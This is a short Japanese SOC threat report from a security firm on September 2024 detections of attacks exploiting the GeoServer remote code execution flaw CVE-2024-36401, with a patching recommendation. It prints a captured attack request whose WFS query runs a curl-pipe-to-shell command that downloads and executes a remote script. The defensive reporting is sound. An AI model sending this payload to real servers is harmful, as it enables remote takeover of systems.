2024.10.16

2024年9月度 MBSD-SOCの検知傾向トピックス

GeoServerの脆弱性（CVE-2024-36401）を狙った攻撃

　今月は、GeoServerの脆弱性（CVE-2024-36401）を狙った攻撃が増加しました。GeoServerは、地理情報を共有するためのオープンソースのソフトウェアです。本脆弱性は、今年7月に公開された脆弱性で、悪用された場合はリモートから任意のコードを実行されてしまう恐れがあります。

　本脆弱性は、CVSS値（脆弱性の深刻度）が9.8と高く、既にPoC（概念実証コード）が公開されています。当該製品を使用されている場合は、早急に最新のバージョンにアップデートすることをお勧めします。

　下図は、本脆弱性を狙った攻撃の検知数推移です。弊社SOCでは7/3(水)から断続的に攻撃を検知していましたが、9月に検知数が増加しました。

図. GeoServerの脆弱性（CVE-2024-36401）を狙った攻撃の検知数推移

　以下は、弊社SOCで検知した攻撃例です。外部から任意のコード実行を試みた通信となっています。

図. GeoServerの脆弱性（CVE-2024-36401）を狙った攻撃例
POST /geoserver/wfs HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0 Host: xx.xx.xx.xx Accept: / Upgrade-Insecure-Requests: 1 Connection: keep-alive Content-Type: application/xml Content-Length: 381 <wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'> <wfs:Query typeNames='topp:states' /> <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl http://xx.xx.xx.xx/sh \| sh -s geoserver')</wfs:valueReference> </wfs:GetPropertyValue>